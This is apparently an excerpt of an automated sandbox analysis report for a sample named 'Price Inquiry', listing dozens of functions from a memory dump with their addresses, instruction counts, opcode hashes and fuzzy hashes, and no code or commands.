Opcode ID: ef1a8bf1dd1faee5ef4f0f01c9f0366c9db3fdc0886469c2031472b97c9c4de1
Instruction ID: aebdd39233c11be6d02c33bc0298febd3959e8771b0b2492bfd4002336c51ff1
Opcode Fuzzy Hash: ef1a8bf1dd1faee5ef4f0f01c9f0366c9db3fdc0886469c2031472b97c9c4de1
Instruction Fuzzy Hash: F631E972E00219AFDB21DFADCD44AAEFBF9EF44750F014469E616E7260D3719E008BA1

Function 017960B8 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdf99f392d444017de4f222a6dea344e3dc7b4f0d0a80c4b1bcfc31134ce1f6c
Instruction ID: 2ec68dacc004f4df4ef23fa049cceb440dfde03c6f327eb8d5c873c7c6db8e44
Opcode Fuzzy Hash: fdf99f392d444017de4f222a6dea344e3dc7b4f0d0a80c4b1bcfc31134ce1f6c
Instruction Fuzzy Hash: ED31F6B1A80202AFDB229F69DC50B6AF7FAAF44754F00426DF506DB341DA70DD058790

Function 016D07AF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b787742eadd0113b5ae198efea5f256a4b51f9d9812650ac0b161fb64f27608d
Instruction ID: bba8256a553d63dad35362a06b194c339bf5c73cd818593912c3f11ae6281e83
Opcode Fuzzy Hash: b787742eadd0113b5ae198efea5f256a4b51f9d9812650ac0b161fb64f27608d
Instruction Fuzzy Hash: 3631C276E04612DBCB12DE688C81A7BBBA6EFD4650F02452DFD56A7310DA30DC0287E5

Function 016D8550 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cc28b3f57e9d63421c0e874b145612f36a0bc89f2f951297e17c39ad6938d18
Instruction ID: 3aa1fb1cc8e5939325d144e4d484d23c33293531592de0199ea8780d65ce73e5
Opcode Fuzzy Hash: 4cc28b3f57e9d63421c0e874b145612f36a0bc89f2f951297e17c39ad6938d18
Instruction Fuzzy Hash: BD318D71A093018FE760CF19C844B2AFBE9FB98B00F45496DF98597352D771E848CBA1

Function 0170A6C7 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
Instruction ID: 2128cb0a9797d4a6a9b25bd27676698e9c21076d714b9f0fc0bb2b9b07f00a13
Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
Instruction Fuzzy Hash: 03312AB2B00B01EFE765CF6DCD40B57BBF8AB08B50F14492DA59AC3691E730E9008B60

Function 0177EBD0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b668d60af765356e39f351ddfe31fe7efb11da6ff86237310327f7b4dc7e006
Instruction ID: 18dab442a8afb423415f1df1209faf0a7e279e3174058e49cee5e175d4b941b2
Opcode Fuzzy Hash: 0b668d60af765356e39f351ddfe31fe7efb11da6ff86237310327f7b4dc7e006
Instruction Fuzzy Hash: 543187B550A301CFCB21DF19C59485AFBFAFB89614F058AAEE4889B311D7309994CB92

Function 016F438F Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1857c443e3d8c55fa49e1ee24376698216fdf4b12d0232ea86de581e12acc359
Instruction ID: 6afd13a1669223280535e79e6b9afcc5ffcd4a01e9264acacbd8756da6220f3c
Opcode Fuzzy Hash: 1857c443e3d8c55fa49e1ee24376698216fdf4b12d0232ea86de581e12acc359
Instruction Fuzzy Hash: B331C272B012059FD720EFA8CD84A6FBBFAEB84704F00856DD206E7A55DB30D945CB90

Function 016CCB7E Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
Instruction ID: 40f6d41ece8907e23e0f1730c49497c4f42402edcfd01fed0ad304f38745087a
Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
Instruction Fuzzy Hash: 77210936E0125AAAD710DBB9C840BBFFBB6EF14740F058079DE55E7740E270C9018790

Function 016CC156 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f47532972e7081fa68e9d1db3605df4c60806dbb7a264adc409a37fabd317257
Instruction ID: c4eb77a10ef9976cf3e1d28d3e1eb1c46b38b7acc1715632ac99fc4f1a61af01
Opcode Fuzzy Hash: f47532972e7081fa68e9d1db3605df4c60806dbb7a264adc409a37fabd317257
Instruction Fuzzy Hash: AC317B725002118BD731AF68CC44B79F7B5EF90314F44C2ADE9469B346EA78D987CB90

Function 0178C3CD Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
Instruction ID: e9afacef9fcc1a63dc79de78d8beb0d51e1bfdd9beb05e9ccb66bbab74a98254
Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
Instruction Fuzzy Hash: 31212B36640652A6CB16BBD98C04AFAFFB5EF40710F40801EFA998B691E634D990C3B0

Function 016CE420 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af0cb911eaf7ba862e404eb6b0448ed9ce422f7a9d980cf5d9c12b5a34660280
Instruction ID: 084b5479226c1306d85c7e86b5839a4be93b4937f6da5eebc1e02c892f57d463
Opcode Fuzzy Hash: af0cb911eaf7ba862e404eb6b0448ed9ce422f7a9d980cf5d9c12b5a34660280
Instruction Fuzzy Hash: 8831F731A0252C9BDB31DF18CC41FFEBBB9EB15B40F4141A9E646A7290D7759E818F90

Function 01704588 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
Instruction ID: 54dd8f0724fd3af37b7bc0f41608e416226ffa226a151b72ad1d76efe86f6b85
Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
Instruction Fuzzy Hash: F3217435A00705EBCB16CF98C984A9EFBF5FF48714F108165EE169B285E671EA058B90

Function 017044B0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f638ceb011363bb1f8a21707967b1826230f9088cf76cc879d6c79ae3ffd5ea
Instruction ID: b9703da40c686efea442b23c9ed25c9a99a4ec0a5ab3d561b15948cda1673ff8
Opcode Fuzzy Hash: 8f638ceb011363bb1f8a21707967b1826230f9088cf76cc879d6c79ae3ffd5ea
Instruction Fuzzy Hash: 3521E372604745DBC722CF18C880B6BB7E5FB88760F11461DFE4A9B280C731EA008BA2

Function 016CE388 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
Instruction ID: c95e273c32914a7c996abaee9444cb718f4e65b3aee0cb51b7ef1126a8090ae0
Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
Instruction Fuzzy Hash: FB319A31600645EFD721DFA8C984F6ABBF9FF85754F1045A9E5568B280E730EE02CB50

Function 0174E609 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4df2f5aecdd17efd6fe39b801abe046a9aa0ee09d0f5e754d7fcf2779ffff5be
Instruction ID: 7ba102417e1b392f0422c3ce809f14792889a0eed72d5519789a9d12f6d3f513
Opcode Fuzzy Hash: 4df2f5aecdd17efd6fe39b801abe046a9aa0ee09d0f5e754d7fcf2779ffff5be
Instruction Fuzzy Hash: 8D317C75A00205DFCB14CF1CC8849AEB7B6FF88724F15445AF8099B391EB75EA50CB96

Function 016D8D59 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
Instruction ID: 70c74f83367cdf5700829f17457a583335de1b49513ec9c55e4548aa487d6249
Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
Instruction Fuzzy Hash: 51212232B01685ABE726AB2CDD18B35BBF9EF80750F1900A4DE42877D3E369DC41C220

Function 017506F1 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ef2434fb2fcdf2a778fe24e1ffb8ddeead5b3952da0cd6f06ce9e8d31c069d1
Instruction ID: 7c1ce86bf6b4f1ec7e2da022d8aae818d58a099dbbfa5ba55436e0ece60e9452
Opcode Fuzzy Hash: 0ef2434fb2fcdf2a778fe24e1ffb8ddeead5b3952da0cd6f06ce9e8d31c069d1
Instruction Fuzzy Hash: 232191719002299BCF20DF59C881ABEF7F8FF48740B504069F941AB244D778AD41CBA1

Function 0175019F Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b5cb6efd3c4b87e4508f4ddbd02bfd5a3bac3b18333311f9661f9934e99e017
Instruction ID: 29adc405feee7eb14da750a06eb1e99e7d45232a3cc40bd5d57adf1129dcea66
Opcode Fuzzy Hash: 8b5cb6efd3c4b87e4508f4ddbd02bfd5a3bac3b18333311f9661f9934e99e017
Instruction Fuzzy Hash: A021BA72600605AFD715DB6CC984F6AB7E8FF48780F1401A9F904DB7A0D674ED40CBA8

Function 01750283 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 729e20494156bcc6357872a56c6959833373d53d59e16d51f24b6bb1b1748b6e
Instruction ID: 5a29756c4b7ae3e15fed4f947522d664dcf1bc0a2eacd63cd6cdcc7a7dc092f0
Opcode Fuzzy Hash: 729e20494156bcc6357872a56c6959833373d53d59e16d51f24b6bb1b1748b6e
Instruction Fuzzy Hash: 5D21D0729053469FD721EF69D948B6BFBECAF90740F08059ABE80C7252D770C905C6A2

Function 016F2835 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f581f15642017eb4529614c12b0d3e33e80110e7a808358be8281c14c896343
Instruction ID: c5da7d735344db20a56322697f7f4050288762a7390d7cffbe2c530dccff491e
Opcode Fuzzy Hash: 3f581f15642017eb4529614c12b0d3e33e80110e7a808358be8281c14c896343
Instruction Fuzzy Hash: 8B2149327056819BE322572CCD1CB24BBC5AF41734F2903ACFA70DB7E2DB68C8418600

Function 0170A30B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 452fe3dee14d7c1083a71c1336b5622b52f162b2a12c653aa5ead8ecaad4dc57
Instruction ID: c831ba50871d985d1c71788c9dbfaa7aa589c9a131184f9a50370ec30b0c57b7
Opcode Fuzzy Hash: 452fe3dee14d7c1083a71c1336b5622b52f162b2a12c653aa5ead8ecaad4dc57
Instruction Fuzzy Hash: F4216879251B01DFC725DF29CD41B56B7F5AF48B04F2484ACA50ACBB61E371E842CB98

Function 01750946 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 949a7a9cec51e7aaeb0bef2c44f96dd967834d3e22a73dd223db98ce4e9618e9
Instruction ID: a9e227abbf7b1df99efdd05899120930234453f2b52ecd2405d6c9432f8abd7e
Opcode Fuzzy Hash: 949a7a9cec51e7aaeb0bef2c44f96dd967834d3e22a73dd223db98ce4e9618e9
Instruction Fuzzy Hash: EA21E9B1E00249AFCB10DFAAD9919AEFBF9FF98710F10412FE405A7254DBB49941CB54

Function 017680A8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
Instruction ID: 9dee8b25b5b76ecf202bee639f7ebc824e92eb1c1aa5df8c35a51675d981650d
Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
Instruction Fuzzy Hash: DB218972A0020AEFDF129F98CC44BAEBBBAEF88310F244859F911A7251E734D9509B50

Function 01700124 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
Instruction ID: 8f6cde2262474e979602f40b23f13b7e527c6f785ee086581ec18225e1c0d94b
Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
Instruction Fuzzy Hash: 8C119D72601705EFE7229B58CC45FAEBBB9EB807A4F104029F6059B1D0D671EE44DB64

Function 016D8770 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01251d88740e41cc7f0f0e7b9e83bf3bf6e2a2a482c008d49b5b95f98af92135
Instruction ID: a18100f215a385db36b3b445f4ba3b1d78f75a59a4d4d951d988c18b241e8ea5
Opcode Fuzzy Hash: 01251d88740e41cc7f0f0e7b9e83bf3bf6e2a2a482c008d49b5b95f98af92135
Instruction Fuzzy Hash: 0511B671B016119BDB12CF4EC8C49AABBEDAF86710B16406DED09DF304D7B1D9018790

Function 0170AAEE Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
Instruction ID: 8ab2278dc3e13fe443df303acd163abb5f20874db312174bac50334ccaeb8007
Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
Instruction Fuzzy Hash: B4216872640B41DBDB22CF5DC544A66FBE6EB94B50F1489ADE54A87A90C770EC01CB80

Function 016D80E9 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 124ca5cd580953d32e9731f378f0e4970030959cf8015afba7b57fcfab2ab13d
Instruction ID: 2d5e0d3ecce557942cc849620a2c1a34dfa48546a39be938bef092aa359840e5
Opcode Fuzzy Hash: 124ca5cd580953d32e9731f378f0e4970030959cf8015afba7b57fcfab2ab13d
Instruction Fuzzy Hash: D0218175A00206DFCB14CF68C985A6EBBF9FB88319F24416DD105A7351C771AD0ACBD0

Function 0170674D Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7243abda8f2ed7c16962431ebff6a277623386ce3f3feeb900bb2e1a82cf650
Instruction ID: ffe50fd234bf4303dc276f6512e954671bc796da8985646da282eb3f2a0c0055
Opcode Fuzzy Hash: a7243abda8f2ed7c16962431ebff6a277623386ce3f3feeb900bb2e1a82cf650
Instruction Fuzzy Hash: AF216A75600B00EFD7218F68C890B66B7E9FF84650F00882DE59AC7291DA30E960CB60

Function 01766870 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03c3516cfa41ba2df102ea9de231c36ed8018f74abec6dfb5c1dc3bea9d254f3
Instruction ID: bdd82645068f232fca56cf209b202e3bc9603a5f8e8ae66c8471c6f517a1eca4
Opcode Fuzzy Hash: 03c3516cfa41ba2df102ea9de231c36ed8018f74abec6dfb5c1dc3bea9d254f3
Instruction Fuzzy Hash: B7119132240615EFC722DB69CD40F9AB7ADEB95A60F51406DFA059B261DA70E901CB90

Function 016FE8C0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47715ae01ddf919c2532fedd6292659c922afa43389378eb053297e7f629cca8
Instruction ID: a4110e3b8c760c8ca650be5e159836e7a5f789e4b856d17a21f65a5c9b677b24
Opcode Fuzzy Hash: 47715ae01ddf919c2532fedd6292659c922afa43389378eb053297e7f629cca8
Instruction Fuzzy Hash: 341148337041109BCB1ACB38CC84A6BB697EFD17B0B25493CEB238B391E9318812C390

Function 017066B0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff3a1259fc26f9a61b88ad82c2f27cfc74279af6d7550128b0b4b7d5bdb65de2
Instruction ID: 1c5c67a5b82bbe8db2fabd045f7cf35908c8230270eeefc5113ca7dd7533d4cb
Opcode Fuzzy Hash: ff3a1259fc26f9a61b88ad82c2f27cfc74279af6d7550128b0b4b7d5bdb65de2
Instruction Fuzzy Hash: 7B11BC76A01305EFCB26DF59C9A4A5AFBEAEF84610B0190BDE9059B350E670DD10CB90

Function 0179A8E4 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
Instruction ID: 110605ebc88f6d7862da50f6073f9010063a987123e4a10eb3cbe4cc0f97c99a
Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
Instruction Fuzzy Hash: 0511E236A00909AFDF19CB58C805A9DFBB6FF84210F058269E845A7384E631AE05CB80

Function 016D0AD0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
Instruction ID: 6f1b17d21a1670ac61445aca9aee2e2bf9fcc5a2e6163ad04df549c20a9cd718
Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
Instruction Fuzzy Hash: 4E2106B5A00B059FD3A0CF29C440B52BBF4FB48B10F10492EE98ACBB40E371E814CB94

Function 0175E7E1 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
Instruction ID: 0ad37d973afb22dbd532b43ed1c89e1f0dfd681ae8e90b84a95aa374199b45dd
Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
Instruction Fuzzy Hash: CF11C132640600EFE7609F48C844B16FBE6EB51754F05942DED099B150DFB0EE40C790

Function 016F27ED Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb04267b84e87904883dcb6c9a4bf0fe49721416412afd374c2dbd84fce25c53
Instruction ID: 678a453d2dc9c6702ac8625e816a3aadb2faaad7c21b25d7f430f1c0307dc445
Opcode Fuzzy Hash: cb04267b84e87904883dcb6c9a4bf0fe49721416412afd374c2dbd84fce25c53
Instruction Fuzzy Hash: 0F012672605685AFE326A26DDC6DF27BB8DEF80354F0600BCFA40CB281DA25DC00C261

Function 016D4690 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d8e3cd857449cd6b271821760092d01aca2ad9b883da5dce3fcb004e363ead3
Instruction ID: 9a68080961ccb8840afa2cb68cc607883fe13d5c559457747fe17e9947f8f9e5
Opcode Fuzzy Hash: 2d8e3cd857449cd6b271821760092d01aca2ad9b883da5dce3fcb004e363ead3
Instruction Fuzzy Hash: 51112536B40690AFDB21CF5ACC80F267BA4EB86B64F024119F9058BB80CB71EC00CF60

Function 01706620 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c89d4d94c86a1842d3b2b6b28ca5afb3b062ffaf05b53edb37cab24ea99b1bb3
Instruction ID: 229a234fb67b3e6b342c16c7c5baf9b5b44aefa6de2c2b6be790aaf748b09d1d
Opcode Fuzzy Hash: c89d4d94c86a1842d3b2b6b28ca5afb3b062ffaf05b53edb37cab24ea99b1bb3
Instruction Fuzzy Hash: 1011C272A01715EBDB22DF59CD90B5EFBF9EF84B50F540459EA01A7240D730ED118B64

Function 016FEA2E Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b03254a3653eb0fb5fccccb92873b5a04565fe2b8b323fc272972307fb0356c3
